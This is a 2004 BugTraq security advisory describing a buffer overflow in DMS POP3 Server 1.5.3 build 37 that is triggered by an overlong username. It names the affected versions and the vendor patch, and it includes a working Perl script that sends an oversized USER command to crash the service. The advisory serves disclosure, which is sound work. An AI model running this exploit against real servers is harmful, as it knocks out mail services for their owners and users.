BugTraq
Buffer overlow in DMS POP3 Server for Windows 2000/XP 1.5.3 build 37 and prior versions. Nov 18 2004 06:43PM
Reed Arvin (reedarvin gmail com)


Summary:

A buffer overflow exists in DMS POP3 Server for Windows 2000/XP 1.5.3 build 37 (http://www.digitalmapping.sk.ca/pop3srv/default.asp) and prior versions.

Details:

A buffer overflow occurs during the POP3 authentication process when an overly long username is supplied. When the username buffer is overflowed successfully the DMS POP3 Service dies resulting in a denial of service.

Vulnerable Versions:

DMS POP3 Server for Windows 2000/XP 1.5.3 build 37 and prior versions

Solutions:

The vendor has provided a patch to fix this issue:

http://www.digitalmapping.sk.ca/pop3srv/Update.asp

Exploit:

#===== Start DMS_POP3_Overflow.pl =====

#

# Usage: DMS_POP3_Overflow.pl <ip> <port>

# DMS_POP3_Overflow.pl 127.0.0.1 110

#

# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37

#

# Download:

# http://www.digitalmapping.sk.ca/pop3srv/default.asp

#

# Patch:

# http://www.digitalmapping.sk.ca/pop3srv/Update.asp

#

#####################################################

use IO::Socket;

use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => $ARGV[1],

Proto => "TCP"))

{

print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";

sleep(1);

print $socket "USER " . "A" x 1023;

close $socket;

sleep(1);

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => $ARGV[1],

Proto => "TCP"))

{

close $socket;

print "failed!\n";

}

else

{

print "successful!\n";

}

}

else

{

print "Cannot connect to $ARGV[0]:$ARGV[1]\n";

}

#===== End DMS_POP3_Overflow.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus